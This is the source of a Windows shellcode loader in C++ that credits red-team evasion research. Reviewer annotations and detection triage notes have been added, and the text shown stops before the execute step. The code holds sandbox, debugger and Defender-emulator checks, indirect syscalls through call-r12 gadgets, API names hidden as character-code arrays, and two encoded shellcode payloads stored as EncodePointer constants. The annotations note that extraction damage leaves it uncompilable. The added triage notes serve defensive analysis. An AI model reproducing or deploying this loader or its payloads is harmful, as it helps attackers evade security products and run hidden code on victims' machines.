/*
 * Credits
 *
 * MDSec - Resolving System Service Numbers using the Exception Directory
 * https://www.mdsec.co.uk/2022/04/resolving-system-service-numbers-using-the-exception-directory/
 *
 * cpu0x00 - Ghost: Evasive shellcode loader
 * https://github.com/cpu0x00/Ghost
 *
 * susMdT - LoudSunRun: Stack Spoofing with Synthetic frames based on the work of namazso, SilentMoonWalk, and VulcanRaven
 * https://github.com/susMdT/LoudSunRun
 *
 * HulkOperator - x64 Call Stack Spoofing
 * https://hulkops.gitbook.io/blog/red-team/x64-call-stack-spoofing
 * https://github.com/HulkOperator/CallStackSpoofer
 *
 * Jan Vojtesek - Raspberry Robin's Roshtyak: A Little Lesson in Trickery
 * https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/
 *
 * dadevel - Detecting Sandboxes Without Syscalls
 * https://pentest.party/posts/2024/detecting-sandboxes-without-syscalls/
 */

// Reviewer overview (annotations only; the code is unchanged from the page).
// In order, the listing: gates on environment values read from KUSER_SHARED_DATA,
// queries the process debug flags, reassembles an embedded payload from
// pointer-sized constants, allocates a PAGE_EXECUTE_READWRITE region and writes the
// payload into it through NT system calls issued via helper stubs, then runs the
// payload on a fiber.
// Triage pointers for a binary built from code like this:
//   - static: the plain "MpVmp32Entry" string, NT API names held as arrays of decimal
//     character codes, and long runs of EncodePointer() calls on 64-bit immediates;
//   - memory: a private, committed, writable+executable region that is executed but
//     is not backed by an image file;
//   - sandboxing: a guest without Secure Boot, or with four or fewer active
//     processors, only ever shows the early fail-fast exit.
// NOTE(review): the page lost text that sat between angle brackets (the #include
// target, template arguments, cast target types) and mis-decoded one '&' sequence,
// so the listing does not compile as shown.

// NOTE(review): header name missing on the page; FindModuleBase, CollectGadgets,
// GoGoGadget, SSNLookup, SyscallEntry, ReSleep, FiveHourEnergy and NTAPI_FUNCTION are
// not defined in this listing and presumably come from it - TODO confirm.
#include

// Service number and syscall pointer of the NT function about to be called. RunMe
// rewrites both before every CallR12(CallMe, ...) call. Declared EXTERN_C, presumably
// so an assembly stub outside this listing can read them - TODO confirm.
EXTERN_C DWORD dwSSN = 0;
EXTERN_C PVOID qwJMP = 0;

// Variadic call helper, defined outside this listing: target function, argument
// count, a gadget address, then the target's own arguments.
EXTERN_C PVOID CallR12(PVOID Function, ULONGLONG nArgs, PVOID r12_gadget, ...);
NTAPI_FUNCTION CallMe();

// These initializers call project helpers during static initialization, i.e. before
// WinMain (and its FiveHourEnergy() gate) runs.
PBYTE hNtdll = FindModuleBase("ntdll.dll");
PBYTE hKernel32 = FindModuleBase("KERNEL32.DLL"); // not referenced again in this listing

// 41 FF D4 is the x86-64 encoding of "call r12". CollectGadgets receives this pattern,
// its length and the ntdll base; how it searches is not visible here.
BYTE callR12sig[] = { 0x41, 0xFF, 0xD4 };
std::vector callR12gadgets = CollectGadgets(callR12sig, sizeof(callR12sig), hNtdll);

PVOID gadget = nullptr;                  // refreshed from GoGoGadget() before each CallR12 call
NTSTATUS status = STATUS_UNSUCCESSFUL;   // assigned by the allocate/write calls; never read in this listing

CHAR NtCE[] = "ZwCreateEvent";
CHAR NtWFSO[] = "ZwWaitForSingleObject";

// Both entries are resolved here but not used in this listing; presumably consumed by
// code defined elsewhere (e.g. ReSleep) - TODO confirm.
SyscallEntry NtCreateEvent = SSNLookup(NtCE);
SyscallEntry sysNtWaitForSingleObject = SSNLookup(NtWFSO); // NtWaitForSingleObject is predefined in winternl.h

LPVOID mainFiber = nullptr;       // result of ConvertThreadToFiber in RunMe
LPVOID shellcodeFiber = nullptr;  // result of CreateFiber in RunMe

// Function to deobfuscate ASCII-encoded strings
//
// Builds a NUL-terminated string from an array of integer character codes.
//   asciiValues  array holding one character code per int
//   length       number of entries in asciiValues
// Returns an owning pointer to a buffer of length + 1 elements (element type lost in
// extraction). Callers use it so API names do not appear as string literals; the names
// remain recoverable by reading the int arrays as ASCII, which also makes those arrays
// usable as static signatures.
std::unique_ptr unASCIIme(const int* asciiValues, size_t length) {
    auto decoded = std::make_unique(length + 1);
    for (size_t i = 0; i < length; ++i)
        decoded[i] = static_cast(asciiValues[i]);
    decoded[length] = '\0'; // Null-terminate the string
    return decoded;
}

// Runs the anti-analysis gates, stages the embedded payload and transfers execution
// to it. Takes no parameters. The function ends in an unconditional while (true)
// loop, so it does not return normally.
//
// Every gate exits through __fastfail, which terminates the process immediately
// without running exception handlers; such exits typically surface in crash telemetry
// as a fail-fast exception (0xC0000409) rather than as a clean exit.
VOID RunMe() {
    // All values below are read straight from the shared user-mode page, so no API or
    // system call is made for them and API-hooking monitors see nothing for these checks.
    const PKUSER_SHARED_DATA ksd = (PKUSER_SHARED_DATA)KUSER_SHARED_DATA_ADDRESS;

    // Check if Secure Boot is enabled
    // NOTE(review): the literal 0xc00000022 used by these gates has nine hex digits, so
    // it is not the 32-bit value 0xC0000022.
    if (!ksd->DbgSecureBootEnabled) __fastfail(0xc00000022); // Exit process if Secure Boot is disabled

    // Check for number of processors
    if (ksd->ActiveProcessorCount <= 4) __fastfail(0xc00000022); // Exit process if 4 or less active processors

    // time1 and TICKS_PER_SECOND are only consumed by the commented-out uptime check.
    constexpr uint32_t TICKS_PER_SECOND = 10'000'000;
    LARGE_INTEGER time1;
    time1.LowPart = ksd->InterruptTime.LowPart;
    time1.HighPart = ksd->InterruptTime.High2Time;
    //if ((time1.QuadPart / TICKS_PER_SECOND / 60 / 60) < 1) __fastfail(0xc00000022); // Exit process if uptime is less than 1 hour

    //if (ksd->BootId < 100) __fastfail(0xc00000022); // Exit process if boot count is less than 100

    // Check for KdDebuggerEnabled
    if (ksd->KdDebuggerEnabled) __fastfail(0xc00000022); // Exit process if true

    // Simple check for VDLLs / Defender emulator
    // The export name is a plain string literal, so it is visible to string scans.
    if (GetProcAddress((HMODULE)hNtdll, "MpVmp32Entry")) __fastfail(0xc00000022); // Exit process if VDLL import is successful

    // Another check for debugger
    // The array decodes to "ZwQueryInformationProcess".
    const int aZwQIP[] = { 90, 119, 81, 117, 101, 114, 121, 73, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 80, 114, 111, 99, 101, 115, 115 };
    std::unique_ptr ZwQIP = unASCIIme(aZwQIP, (sizeof(aZwQIP) / sizeof(aZwQIP[0])));
    const PCHAR NtQIP = ZwQIP.get();

    // Pattern repeated for every NT call in this function: look the name up, publish the
    // service number and syscall pointer through the two globals, fetch a gadget, then
    // call through CallR12 with CallMe as the target. Per the credits this is meant to
    // resolve service numbers without reading the stubs and to present a return address
    // inside ntdll; the helpers' implementations are not in this listing - TODO confirm.
    SyscallEntry NtQueryInformationProcess = SSNLookup(NtQIP);
    dwSSN = NtQueryInformationProcess.SSN;
    qwJMP = NtQueryInformationProcess.Syscall;
    gadget = GoGoGadget(callR12gadgets);

    PVOID debugFlags = nullptr;
    // As written, the process exits when the call reports success and the value
    // written to debugFlags is non-zero.
    if (NT_SUCCESS((NTSTATUS)CallR12(
        (PVOID)CallMe,
        4,
        gadget,
        NtCurrentProcess(),
        (PROCESSINFOCLASS)31, // ProcessDebugFlags
        &debugFlags,
        sizeof(debugFlags),
        NULL
    )) && debugFlags) __fastfail(0xC0000409); // Exit process if debugger is detected

    // Shellcode deobfuscation and preparation
    // Each line carries eight payload bytes as a 64-bit immediate passed through
    // EncodePointer(); the loop further down reverses that with DecodePointer() and emits
    // the bytes most-significant first. 49 segments x 8 bytes = 392 bytes, matching
    // reserve(392). In a compiled image a 64-bit immediate is normally stored
    // little-endian, so the payload bytes would appear reversed within each 8-byte group.
    // NOTE(review): the opening bytes (48 31 C9 48 81 E9 ...) look like a self-decoding
    // XOR stub, in which case the remaining bytes are encoded - TODO confirm. What the
    // payload does cannot be determined from this listing.
    PVOID cHzWuUOLpKshEZso = EncodePointer((PVOID)0x4831c94881e9d4ff);
    PVOID qzmcczftlrofpMBK = EncodePointer((PVOID)0xffff488d05efffff);
    PVOID BnFPxxUTdHzXfBou = EncodePointer((PVOID)0xff48bb44f6a40b5f);
    PVOID XXNMyWIolkZnxquw = EncodePointer((PVOID)0x895d7f4831582748);
    PVOID MaFIrEQDZFRfWRTY = EncodePointer((PVOID)0x2df8ffffffe2f4b8);
    PVOID RdUZgSEaEksHKBzw = EncodePointer((PVOID)0xbe27efaf619d7f44);
    PVOID BqaqZEeAEPNHxCHA = EncodePointer((PVOID)0xf6e55a1ed90f2e12);
    PVOID pEfFdhEqFdQpoqch = EncodePointer((PVOID)0xbe95d93ac1d62d24);
    PVOID WOLbfAoYkcEkuDYg = EncodePointer((PVOID)0xbe2f5947c1d62d64);
    PVOID uwiZKXhkheFneKTM = EncodePointer((PVOID)0xbe2f790fc152c80e);
    PVOID FMlGRbqbLHPhGOeo = EncodePointer((PVOID)0xbce93a96c16cbfe8);
    PVOID yXPdbUEcVExPHxIj = EncodePointer((PVOID)0xcac5775da57d3e85);
    PVOID MZGgjmoAILVGCTyd = EncodePointer((PVOID)0x3fa94a5e48bf9216);
    PVOID GurEATzzcVZVIzYS = EncodePointer((PVOID)0xb7f543d4db7df406);
    PVOID hNplZltYVPpESpst = EncodePointer((PVOID)0xcaec0a8f02ddf744);
    PVOID xCgWVknCyvRsVUHZ = EncodePointer((PVOID)0xf6a443da4929180c);
    PVOID umughcydaJUtAhrt = EncodePointer((PVOID)0xf7745bd4c1453bcf);
    PVOID RqCqvWaIneDObANK = EncodePointer((PVOID)0xb684425e59be290c);
    PVOID axOWFjDeHhmDuStA = EncodePointer((PVOID)0x096d4ad4bdd53745);
    PVOID PzyVUWkmkIQWwsAh = EncodePointer((PVOID)0x20e93a96c16cbfe8);
    PVOID UKaEuxbaMHcFVHRE = EncodePointer((PVOID)0xb765c252c85cbe7c);
    PVOID GPBJMzmxizdGDxbs = EncodePointer((PVOID)0x16d1fa138a115b4c);
    PVOID aEUbBqlVLqLgCpmm = EncodePointer((PVOID)0xb39dda2a51053bcf);
    PVOID HKzolWqSFHEaxocQ = EncodePointer((PVOID)0xb680425e593b3ecf);
    PVOID rGrpgUSTDCGnRSxX = EncodePointer((PVOID)0xfaec4fd4c9413645);
    PVOID UkiKuEWPihQsBZed = EncodePointer((PVOID)0x26e5805b01157e94);
    PVOID UtRdjVdGKiLgoqiz = EncodePointer((PVOID)0xb7fc4a07d7042505);
    PVOID jmRaVonpGRiCdgiL = EncodePointer((PVOID)0xaee5521ed315fca8);
    PVOID pTGvgohiOFOLvctP = EncodePointer((PVOID)0xd6e559a069053e1d);
    PVOID jjMvRmnTSOFJsHUQ = EncodePointer((PVOID)0xacec804d600a80bb);
    PVOID ecThXoPqvgeoPdTY = EncodePointer((PVOID)0x09f943e5885d7f44);
    PVOID KqVeBhXZWhqorIlQ = EncodePointer((PVOID)0xf6a40b5fc1d0f245);
    PVOID rUrHyjHgczZsKdEw = EncodePointer((PVOID)0xf7a40b1e336cf42b);
    PVOID BHscujBmZqkyPcao = EncodePointer((PVOID)0x715bdee479e8dd12);
    PVOID nbtyRzIjuCLOzHPX = EncodePointer((PVOID)0xb71eadca34c08091);
    PVOID oaAwYlpVCipgbUeo = EncodePointer((PVOID)0xbe27cf77b55b034e);
    PVOID RfLfmiVPuCbBjmaj = EncodePointer((PVOID)0x765feb2a8ce63857);
    PVOID eFSJSYqBtDEtyjXg = EncodePointer((PVOID)0x84cb615fd01cf69e);
    PVOID beyiUDTcLMuJgbDM = EncodePointer((PVOID)0x09716e27f9311036);
    PVOID yaLBwyEBzokIYAHF = EncodePointer((PVOID)0x93d6253af1385f66);
    PVOID qowPmWxYQjBdZNYP = EncodePointer((PVOID)0x9ed07f2ffa67506b);
    PVOID GNvPOEZbSgXPdGal = EncodePointer((PVOID)0x9fc5326fbd6b4f7d);
    PVOID bzxbcOVbSveYzfeO = EncodePointer((PVOID)0xd8d17871e82f1c2c);
    PVOID LcYaLRXtmsZogKlT = EncodePointer((PVOID)0x9fd26e71e62f186b);
    PVOID gIKApmGFAWwPmQgq = EncodePointer((PVOID)0xc28b622bec300c6b);
    PVOID XQGRystfEcTjlPuc = EncodePointer((PVOID)0x84cd6834a42f1028);
    PVOID mQGOcpeQBbPvvUfc = EncodePointer((PVOID)0x9a8b5936ea365a76);
    PVOID EEezIaJMrCWOAPsU = EncodePointer((PVOID)0xc6f66433e5731625);
    PVOID QRiWTvDaBIzcspUq = EncodePointer((PVOID)0xd8c97b6bab5d7f90);

    // Segment order here is payload order; the decode loop iterates this container.
    std::vector encodedSegments = {
        cHzWuUOLpKshEZso, qzmcczftlrofpMBK, BnFPxxUTdHzXfBou, XXNMyWIolkZnxquw,
        MaFIrEQDZFRfWRTY, RdUZgSEaEksHKBzw, BqaqZEeAEPNHxCHA, pEfFdhEqFdQpoqch,
        WOLbfAoYkcEkuDYg, uwiZKXhkheFneKTM, FMlGRbqbLHPhGOeo, yXPdbUEcVExPHxIj,
        MZGgjmoAILVGCTyd, GurEATzzcVZVIzYS, hNplZltYVPpESpst, xCgWVknCyvRsVUHZ,
        umughcydaJUtAhrt, RqCqvWaIneDObANK, axOWFjDeHhmDuStA, PzyVUWkmkIQWwsAh,
        UKaEuxbaMHcFVHRE, GPBJMzmxizdGDxbs, aEUbBqlVLqLgCpmm, HKzolWqSFHEaxocQ,
        rGrpgUSTDCGnRSxX, UkiKuEWPihQsBZed, UtRdjVdGKiLgoqiz, jmRaVonpGRiCdgiL,
        pTGvgohiOFOLvctP, jjMvRmnTSOFJsHUQ, ecThXoPqvgeoPdTY, KqVeBhXZWhqorIlQ,
        rUrHyjHgczZsKdEw, BHscujBmZqkyPcao, nbtyRzIjuCLOzHPX, oaAwYlpVCipgbUeo,
        RfLfmiVPuCbBjmaj, eFSJSYqBtDEtyjXg, beyiUDTcLMuJgbDM, yaLBwyEBzokIYAHF,
        qowPmWxYQjBdZNYP, GNvPOEZbSgXPdGal, bzxbcOVbSveYzfeO, LcYaLRXtmsZogKlT,
        gIKApmGFAWwPmQgq, XQGRystfEcTjlPuc, mQGOcpeQBbPvvUfc, EEezIaJMrCWOAPsU,
        QRiWTvDaBIzcspUq,
    };

    // Disabled alternate payload: 121 segments x 8 bytes = 968 bytes, which pairs with
    // the commented-out reserve(968) below. Left exactly as the author commented it out.
    /*
    PVOID krIEKgMUckshcyth = EncodePointer((PVOID)0x4831c94881e98cff);
    PVOID QWkajnALnvaRsXCA = EncodePointer((PVOID)0xffff488d05efffff);
    PVOID CeYoXADihJDoHkcl = EncodePointer((PVOID)0xff48bbaee21ec0b3);
    PVOID nfjTEYcZQXkZiWvq = EncodePointer((PVOID)0x25756d4831582748);
    PVOID tGBPOHuvKLwWbBtJ = EncodePointer((PVOID)0x2df8ffffffe2f452);
    PVOID HQqVSTVgjAGxTLla = EncodePointer((PVOID)0xaa9d2443cdbd6dae);
    PVOID IyJIcAzzdurFOXMr = EncodePointer((PVOID)0xe25f91f275273cf8);
    PVOID EomlYIUvHVPzVCPq = EncodePointer((PVOID)0xaa2f12d66dfe3fce);
    PVOID MhLnnvUpqwnGeCQO = EncodePointer((PVOID)0xaa9592ab6dfe3f8e);
    PVOID lAVufBEVDLjdqjSN = EncodePointer((PVOID)0xaa95b2e36d7adae4);
    PVOID lyIsmmKQJJFMxyIP = EncodePointer((PVOID)0xa853f17a6d44ad02);
    PVOID wCmtzFFisgJoeFTu = EncodePointer((PVOID)0xde7fbcb109552c6f);
    PVOID uBQaheNuCEJPdxkE = EncodePointer((PVOID)0x2b1381b2e49780fc);
    PVOID yrAqmLdqjkZBZUXE = EncodePointer((PVOID)0xa34f88387755e6ec);
    PVOID xCvJXFXIYPisMYMl = EncodePointer((PVOID)0xde56c16343f415b6);
    PVOID LMyfWsonixmJCjKt = EncodePointer((PVOID)0xe91cb5c1aef5e5ae);
    PVOID umAuguFVUxEEpqcK = EncodePointer((PVOID)0xe21e8836e5010ae6);
    PVOID aiIvegbEKgBAvdpR = EncodePointer((PVOID)0xe3ce90386d6d2925);
    PVOID ZItbRCkHKHFHckqE = EncodePointer((PVOID)0xa23e89b2f5963be6);
    PVOID ZUJPGKeSgjpvZvpg = EncodePointer((PVOID)0x1dd7813811fd25af);
    PVOID MDrHafAiCgwASRzu = EncodePointer((PVOID)0x3453f17a6d44ad02);
    PVOID CFlaqnulvNhVlsuQ = EncodePointer((PVOID)0xa3df09be6474ac96);
    PVOID dildBNSkNXDncZir = EncodePointer((PVOID)0x026b31ff263949a6);
    PVOID UlXnockwSnbogPmD = EncodePointer((PVOID)0xa72711c6fd2d2925);
    PVOID JVPKCMOVrbhTPhfT = EncodePointer((PVOID)0xa23a89b2f5132c25);
    PVOID onyrPdbCvnfjhTNU = EncodePointer((PVOID)0xee568438656924af);
    PVOID kFTLVfxydGdjJEbU = EncodePointer((PVOID)0x325f4bb7ad3d6c7e);
    PVOID PHVVjcHnnMIZKTxt = EncodePointer((PVOID)0xa34681eb7b2c37ef);
    PVOID BABOMVJKASBILOkV = EncodePointer((PVOID)0xba5f99f27f3dee42);
    PVOID dEDiMsmKQdoHMiWr = EncodePointer((PVOID)0xc25f924cc52d2cf7);
    PVOID EJOAmoTqhdxPYXLc = EncodePointer((PVOID)0xb8564ba1cc3a9251);
    PVOID psgWEvdDRudqaGGs = EncodePointer((PVOID)0x1d43aab36ccb1ac7);
    PVOID ZoEnKeyVrVRkPuTk = EncodePointer((PVOID)0x8c77aed651752cf8);
    PVOID iTcyNhLMShqPlLZs = EncodePointer((PVOID)0xab9726ffac842c14);
    PVOID qoJiHAESeTpwXDSd = EncodePointer((PVOID)0xae69e6b4daa0259f);
    PVOID aOJgXyvKxIvgoBgJ = EncodePointer((PVOID)0x2b56f1616844ade3);
    PVOID xfrAixNWrcXrheuk = EncodePointer((PVOID)0xd3d781e364252c14);
    PVOID aJIVbhbZxcbrhypR = EncodePointer((PVOID)0xd848b914daa0843d);
    PVOID VwYJJeTakOnoCMPt = EncodePointer((PVOID)0xe21ec0e96dfcacef);
    PVOID rlUuwMIqANbovtbA = EncodePointer((PVOID)0x5aa5c1b325385c67);
    PVOID jDFVdQIPDyUVhMBE = EncodePointer((PVOID)0xa34f81e24f762cff);
    PVOID knDHyhHBZVbSkLTv = EncodePointer((PVOID)0xa3a4973abab3927b);
    PVOID LUMvamZSJwELMLoQ = EncodePointer((PVOID)0x09679bfbacb4259f);
    PVOID bTwcgbZbeAxmTAYZ = EncodePointer((PVOID)0x3057496b6844a4fc);
    PVOID jTbpRPdGmOjyvWon = EncodePointer((PVOID)0x8a1ef273a1273fef);
    PVOID SmsRxxsOPSnuEhDy = EncodePointer((PVOID)0x58f5959d1e8ab8e6);
    PVOID YCyjFvpSdYSlBJyj = EncodePointer((PVOID)0x6bd88830e62507a4);
    PVOID GntpyNoBQXpbosRA = EncodePointer((PVOID)0xbd5649429f6a6dae);
    PVOID EiHSXDEEmVtPIvPs = EncodePointer((PVOID)0xe274c0dba5466dae);
    PVOID XIbJRyCtStexapEh = EncodePointer((PVOID)0xab9720f29c716dae);
    PVOID oSmfRVGkIijIMsTK = EncodePointer((PVOID)0xe25f7ac663ebeb51);
    PVOID PcRTPakTcHrHFxmH = EncodePointer((PVOID)0x375649426dfcb7e7);
    PVOID YtjjHzbzkpqYCbGz = EncodePointer((PVOID)0x25de3f4cda8a209f);
    PVOID HfLVqFQwkOEsWtbl = EncodePointer((PVOID)0x2b4c92f29f586bb6);
    PVOID LOejixJWRypNFlbg = EncodePointer((PVOID)0x99e11536e57ae833);
    PVOID DyOkeoKaoYMZCVlG = EncodePointer((PVOID)0xe31ec0fbdaba622a);
    PVOID xTDWSjXynEghzrHl = EncodePointer((PVOID)0x6e1fc0b3cec6844a);
    PVOID wokRsoosPSrXRxoX = EncodePointer((PVOID)0xe31ec05ba78a9251);
    PVOID IfskwrDHMOCaJVlY = EncodePointer((PVOID)0xcd4ca6ff7c758ad8);
    PVOID HwRLpNYHwsFUeyDw = EncodePointer((PVOID)0x7521a081518bc619);
    PVOID lmGqmZrvlGUOrRKB = EncodePointer((PVOID)0x2edf62efea476fe0);
    PVOID kjhzgnhkazaLpOaf = EncodePointer((PVOID)0xdf2fd4284b064e57);
    PVOID SFBoFCsOqDApIthi = EncodePointer((PVOID)0x83134b9403cf3cb4);
    PVOID GUurAqySyQdiTqVg = EncodePointer((PVOID)0xeb56c407abc7e138);
    PVOID SEoErayORsYSBPsa = EncodePointer((PVOID)0xc89c92eed7e9fa29);
    PVOID HEGkFPbqTTzchkZt = EncodePointer((PVOID)0xb5871f8351984a22);
    PVOID xGrHkQQPiNGkFFVJ = EncodePointer((PVOID)0x902ddd7af17ae948);
    PVOID OvbCdXvSdFRrnfCI = EncodePointer((PVOID)0xd143b2341fccb4ae);
    PVOID tgHtuLOhwbmqHRjB = EncodePointer((PVOID)0xb76da5c108340acb);
    PVOID memKxcpTMMzDpryc = EncodePointer((PVOID)0x8c6afa93681a17c7);
    PVOID aoyQmYeyjLSnrSrx = EncodePointer((PVOID)0x8e72a19c105b5d8e);
    PVOID YgnEoeUlhddvVQTm = EncodePointer((PVOID)0xca7dafde551419c7);
    PVOID whjkzDKpJpQCVCBs = EncodePointer((PVOID)0x8072a58805383ee7);
    PVOID LefRaQEduzEOJwVe = EncodePointer((PVOID)0xa73ef99d154e4df9);
    PVOID YrYCQrExJKWDsNpf = EncodePointer((PVOID)0x8b70a4dc52064de0);
    PVOID oqRFDusrpLSbPphX = EncodePointer((PVOID)0xb63ef69d144e4df9);
    PVOID yvfaBpFPYFzSyQAe = EncodePointer((PVOID)0x8b70f6871e551598);
    PVOID TPPCEEWVmOPBVMhc = EncodePointer((PVOID)0xd625e0e7571c09cb);
    PVOID QtiImdJSPmAbIdYe = EncodePointer((PVOID)0x8c6aef860b45568e);
    PVOID eLCBuECVLmRGqvfu = EncodePointer((PVOID)0xa368a1dd51552fdc);
    PVOID RkiXjfwMXsmrknjO = EncodePointer((PVOID)0x8d69b3d6575c60a4);
    PVOID UlGnizOxTJCwMmHI = EncodePointer((PVOID)0xe2707c0a347d598e);
    PVOID qZExSoKoNEXvtTlz = EncodePointer((PVOID)0xbeaab191b6de0212);
    PVOID RbFVCMekFTdhQOha = EncodePointer((PVOID)0x30b96d74f6651de0);
    PVOID HiwzwEzvuPqarpwk = EncodePointer((PVOID)0x776556e29d8d81b6);
    PVOID ybwPLsWnYaOtxkMT = EncodePointer((PVOID)0x32f60c2b1f47267f);
    PVOID AJbMNddZoUCBKwLI = EncodePointer((PVOID)0xbc792f1d2a480cf2);
    PVOID VbUhsxlgakUxfFWj = EncodePointer((PVOID)0x3edf495404d6ad6c);
    PVOID SCuTpiPFsyydpUcV = EncodePointer((PVOID)0x7d933955b10bda58);
    PVOID zUTCMPUlfduLGXPU = EncodePointer((PVOID)0x584850a84deaf6fe);
    PVOID DylxQsmDjSozMMxM = EncodePointer((PVOID)0x4f0a857c24deb36d);
    PVOID NVkQklrWstmsSAiw = EncodePointer((PVOID)0x7313a0ca27324d49);
    PVOID HNmhsNxSvLjRpqAc = EncodePointer((PVOID)0x83f587278170bb40);
    PVOID zSLuOBvdZBzznIvK = EncodePointer((PVOID)0x96143eccabbbf0ee);
    PVOID VxVycFciJqqThtEu = EncodePointer((PVOID)0xc647054aa7f03fa8);
    PVOID dgjMvpNGeaxEuRxr = EncodePointer((PVOID)0x121dbb3150ca4c8d);
    PVOID ENcMqFMOSzmJTbUU = EncodePointer((PVOID)0xc3d5583a9a1aee3e);
    PVOID KKuLFnbeRMMOkedy = EncodePointer((PVOID)0xd1f42710416e2b4f);
    PVOID ZgMMdogCmHDUUukz = EncodePointer((PVOID)0xfe2e32ac67fe2c6c);
    PVOID CxdwxNOEssmeUHfm = EncodePointer((PVOID)0x07a66d36cc8463af);
    PVOID FfyoAvOYVUSKVAzD = EncodePointer((PVOID)0x816204c9cf608d7d);
    PVOID ZCPMUWeDAdXigRtD = EncodePointer((PVOID)0xdf0c7c48750401fa);
    PVOID GcpTiltvPYfYLByL = EncodePointer((PVOID)0x6440564f52f14b61);
    PVOID hkIaGKIPEsfchJii = EncodePointer((PVOID)0xf7c6dd4713cb25f8);
    PVOID JtXCgcjawgmfmmYz = EncodePointer((PVOID)0x4396e7c465f38001);
    PVOID EaPhWisXFOXALwvu = EncodePointer((PVOID)0x5ab46fb99b11b6ae);
    PVOID ceOPQDcrBgRHbKhs = EncodePointer((PVOID)0xa3a030068723927b);
    PVOID rtvYLBjAHBxWFnEe = EncodePointer((PVOID)0xaa2f090925752dae);
    PVOID paTgHCLbLPZOMFnG = EncodePointer((PVOID)0xa3a6c0a325752c17);
    PVOID pwBDbhXREYBnCIIW = EncodePointer((PVOID)0xa21ec0b364cf350a);
    PVOID ldWBkSthBfKmzZxE = EncodePointer((PVOID)0xb1fb3f666de63efd);
    PVOID EBhgqEDeboRHaFvr = EncodePointer((PVOID)0xaa9727fbac842527);
    PVOID qmMwJdHAeiMmEiyq = EncodePointer((PVOID)0x385f78b305756de7);
    PVOID KRzXAMZWRINZuHsb = EncodePointer((PVOID)0x6be7810937e3e44c);
    PVOID GikexHLZKjRWaytn = EncodePointer((PVOID)0x1dcb8830e155e86e);
    PVOID JINcqvcBwtxUNHDs = EncodePointer((PVOID)0x96a8a638223d6c6d);
    PVOID XQbBOLueHittAYfr = EncodePointer((PVOID)0x67deb5647d2d35e6);
    PVOID lJOjAuLhQrnAueya = EncodePointer((PVOID)0xe71ec0b32525ae46);
    PVOID qvhawvNPscjIIsvz = EncodePointer((PVOID)0x9de33f4c1445439a);
    PVOID QKhlMrDkiQesodAU = EncodePointer((PVOID)0xd030f4810b406d94);
    PVOID cCqPJkKulaeTiDQi = EncodePointer((PVOID)0x3c7671b325756d90);

    std::vector encodedSegments = {
        krIEKgMUckshcyth, QWkajnALnvaRsXCA, CeYoXADihJDoHkcl, nfjTEYcZQXkZiWvq,
        tGBPOHuvKLwWbBtJ, HQqVSTVgjAGxTLla, IyJIcAzzdurFOXMr, EomlYIUvHVPzVCPq,
        MhLnnvUpqwnGeCQO, lAVufBEVDLjdqjSN, lyIsmmKQJJFMxyIP, wCmtzFFisgJoeFTu,
        uBQaheNuCEJPdxkE, yrAqmLdqjkZBZUXE, xCvJXFXIYPisMYMl, LMyfWsonixmJCjKt,
        umAuguFVUxEEpqcK, aiIvegbEKgBAvdpR, ZItbRCkHKHFHckqE, ZUJPGKeSgjpvZvpg,
        MDrHafAiCgwASRzu, CFlaqnulvNhVlsuQ, dildBNSkNXDncZir, UlXnockwSnbogPmD,
        JVPKCMOVrbhTPhfT, onyrPdbCvnfjhTNU, kFTLVfxydGdjJEbU, PHVVjcHnnMIZKTxt,
        BABOMVJKASBILOkV, dEDiMsmKQdoHMiWr, EJOAmoTqhdxPYXLc, psgWEvdDRudqaGGs,
        ZoEnKeyVrVRkPuTk, iTcyNhLMShqPlLZs, qoJiHAESeTpwXDSd, aOJgXyvKxIvgoBgJ,
        xfrAixNWrcXrheuk, aJIVbhbZxcbrhypR, VwYJJeTakOnoCMPt, rlUuwMIqANbovtbA,
        jDFVdQIPDyUVhMBE, knDHyhHBZVbSkLTv, LUMvamZSJwELMLoQ, bTwcgbZbeAxmTAYZ,
        jTbpRPdGmOjyvWon, SmsRxxsOPSnuEhDy, YCyjFvpSdYSlBJyj, GntpyNoBQXpbosRA,
        EiHSXDEEmVtPIvPs, XIbJRyCtStexapEh, oSmfRVGkIijIMsTK, PcRTPakTcHrHFxmH,
        YtjjHzbzkpqYCbGz, HfLVqFQwkOEsWtbl, LOejixJWRypNFlbg, DyOkeoKaoYMZCVlG,
        xTDWSjXynEghzrHl, wokRsoosPSrXRxoX, IfskwrDHMOCaJVlY, HwRLpNYHwsFUeyDw,
        lmGqmZrvlGUOrRKB, kjhzgnhkazaLpOaf, SFBoFCsOqDApIthi, GUurAqySyQdiTqVg,
        SEoErayORsYSBPsa, HEGkFPbqTTzchkZt, xGrHkQQPiNGkFFVJ, OvbCdXvSdFRrnfCI,
        tgHtuLOhwbmqHRjB, memKxcpTMMzDpryc, aoyQmYeyjLSnrSrx, YgnEoeUlhddvVQTm,
        whjkzDKpJpQCVCBs, LefRaQEduzEOJwVe, YrYCQrExJKWDsNpf, oqRFDusrpLSbPphX,
        yvfaBpFPYFzSyQAe, TPPCEEWVmOPBVMhc, QtiImdJSPmAbIdYe, eLCBuECVLmRGqvfu,
        RkiXjfwMXsmrknjO, UlGnizOxTJCwMmHI, qZExSoKoNEXvtTlz, RbFVCMekFTdhQOha,
        HiwzwEzvuPqarpwk, ybwPLsWnYaOtxkMT, AJbMNddZoUCBKwLI, VbUhsxlgakUxfFWj,
        SCuTpiPFsyydpUcV, zUTCMPUlfduLGXPU, DylxQsmDjSozMMxM, NVkQklrWstmsSAiw,
        HNmhsNxSvLjRpqAc, zSLuOBvdZBzznIvK, VxVycFciJqqThtEu, dgjMvpNGeaxEuRxr,
        ENcMqFMOSzmJTbUU, KKuLFnbeRMMOkedy, ZgMMdogCmHDUUukz, CxdwxNOEssmeUHfm,
        FfyoAvOYVUSKVAzD, ZCPMUWeDAdXigRtD, GcpTiltvPYfYLByL, hkIaGKIPEsfchJii,
        JtXCgcjawgmfmmYz, EaPhWisXFOXALwvu, ceOPQDcrBgRHbKhs, rtvYLBjAHBxWFnEe,
        paTgHCLbLPZOMFnG, pwBDbhXREYBnCIIW, ldWBkSthBfKmzZxE, EBhgqEDeboRHaFvr,
        qmMwJdHAeiMmEiyq, KRzXAMZWRINZuHsb, GikexHLZKjRWaytn, JINcqvcBwtxUNHDs,
        XQbBOLueHittAYfr, lJOjAuLhQrnAueya, qvhawvNPscjIIsvz, QKhlMrDkiQesodAU,
        cCqPJkKulaeTiDQi,
    };
    */

    // Predefine expected shellcode size and pre-allocate space
    alignas(8) std::vector shellcode;
    //shellcode.reserve(968);
    shellcode.reserve(392);

